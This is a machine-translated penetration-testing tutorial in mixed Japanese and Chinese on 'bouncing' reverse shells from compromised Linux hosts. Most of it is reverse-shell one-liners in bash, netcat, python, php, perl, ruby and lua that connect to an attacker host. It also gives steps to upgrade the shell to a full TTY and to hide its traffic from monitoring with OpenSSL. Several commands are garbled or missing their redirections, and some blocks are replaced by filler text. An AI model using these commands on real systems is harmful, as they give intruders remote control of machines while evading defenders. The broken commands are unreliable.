シェルの深い理解: 一般名詞の分析と侵入における応用シナリオ

貝殻とは

シェルは、getshell、webshel​​l、crashshellなど、すべてシェルに関連するペネトレーションで一般的に使用される用語です。

百度百科事典で説明されたシェル:

コンピューターサイエンスでは、シェルは（コアと区別するために）シェルとも呼ばれ、「ユーザーに操作インターフェイスを提供すること」を指します

face」ソフトウェア (コマンドパーサー)

DOS 以降のものと同様です。

cmd.exe。ユーザーコマンドを受信し、対応するアプリケーションを呼び出します。

簡単に言うと、ユーザーはシェルを通じてオペレーティング システム カーネルのサービスにアクセスします。つまり、シェルからカーネルにアクセスして、システム コマンドを実行します。

getshell: ターゲットのコマンド実行権限を取得します

webshel​​l: Web サービスを通じてコマンドを実行する Web サイトのサイドドアlinux kernel sprintfを指します

Dip シェル: コマンドラインの入力と出力を他のホストに転送します

なぜシェルを落とす必要があるのですか

1. Web シェルでコマンドを実行する場合、対話は行われません。シェル処理やその他の操作を容易にするために、シェルを開く必要があります。

2. リバウンド シェルは、Web シェルが検出されて削除されても、権限は失われません。

Linux でシェルをクラッシュするために一般的に使用される方法

whereis コマンドを使用して、ターゲットでサポートされているコールバック手法を確認します。

リーリー

bash がシェルをクラッシュさせる

Bash コールバックは実際の戦闘で最もよく使用されるメソッドです

リーリー

コマンドを逆アセンブルして分析します:

1. bash-i はローカルで bash を開くことを意味します

2. /dev/tcp/ は Linux の特別なデバイスです。このファイルを開くことは、ソケット呼び出しを発行してソケット接続を構築することと同じです。

3. >& の隣のファイル /dev/tcp/ip/port は、標準出力と標準エラー出力をこのファイルにリダイレクトし、リモート vps に渡すことを意味します

4. リモート vps が盗聴のために対応するポートを開くと、この bash の標準出力と標準エラー出力を受け取ります。

NC急落シェル

ターゲットホストにNCがインストールされている必要があります

リーリー

使用其他版本的nc

nc.traditional ip port -e /bin/sh

配合命名管线进行大跌：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f

python大跌shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

首先使用socket与远程构建起联接，接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程，dup2这个方式有两个参数，分别为文件描述符fd1和fd2，当fd2参数存在时，就关掉fd2，之后将fd1代表的那种文件强行复制给fd2linux之家，在这儿可以把fd1和fd2看作是C语言里的表针，将fd1形参给fd2，就相当于将fd2指向于s.fileno()，fileno()返回的是一个文件描述符，在这儿也就是构建socket联接返回的文件描述符，复印下来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接出来使用os的subprocess在本地开启一个子进程，传入参数“-i”使bash以交互模式启动，标准输入、标准输出、标准错误输出又被重定向到了远程，这样的话就可以在远程执行输入命令了。

php大跌shell

须要php关掉safe_mode选项，才可以使用exec函数。

使用php的exec函数执行方式1大跌shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'

使用php的fsockopen去大跌shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'

其它大跌方式

exec大跌

0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196

perl大跌

perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby大跌

ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

lua大跌

lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i &3 2>&3');"

获取一个完全交互shell

通过上述命令大跌shell得到的shell并不能称为完全交互的shell，一般称之为'哑'shell。

一般存在以下缺点

因而有必要去获取一个完全交互的shell。

1、在shell中执行python,使用pty模块，创建一个原生的终端，命令如下：

python -c 'import pty; pty.spawn("/bin/bash")'

隐藏

运行完后

2、键入Ctrl-Z暂停任务，切回到VPS的命令行中；在VPS中执行：

stty raw -echo 
fg #将后台运行或挂起的任务切换到前台运行

3、在shell中执行，得到一个完全交互的shell，支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104

SSL流量加密

部份防护设备会对内外网传输流量进行审查，大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令，很容易被查杀。

因而须要将原始流量使用openssl加密，绕开流量审计设备。

1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填，仍然回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

2、vps使用OpenSSL窃听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

3、目标主机执行回调加密shell

mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

大跌成功，成功接收到ssl流量加密的shell。

参考リンク

以上がシェルの深い理解: 一般名詞の分析と侵入における応用シナリオの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。